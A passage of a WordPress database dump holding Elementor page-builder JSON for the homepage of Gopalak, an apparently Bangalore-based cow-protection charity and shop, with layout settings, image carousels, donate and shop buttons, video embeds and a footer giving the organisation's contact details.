mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#43693F\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b6ac0a\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"a3cc846\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"793c8dc\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"72a7055\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d16d59b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"94e41e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"af9eefd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9631635\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61c526b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4046e16\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"acbd211\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2894738\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"a4c68e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1216c33\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aac0ac3\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"298cd32\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"d121900\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"4a280f6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12279,2014,'_elementor_page_assets','a:0:{}'),(12281,2015,'_elementor_edit_mode','builder'),(12282,2015,'_elementor_template_type','wp-page'),(12283,2015,'_elementor_version','3.7.8'),(12284,2015,'_wp_page_template','elementor_canvas'),(12285,2015,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#43693F\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/27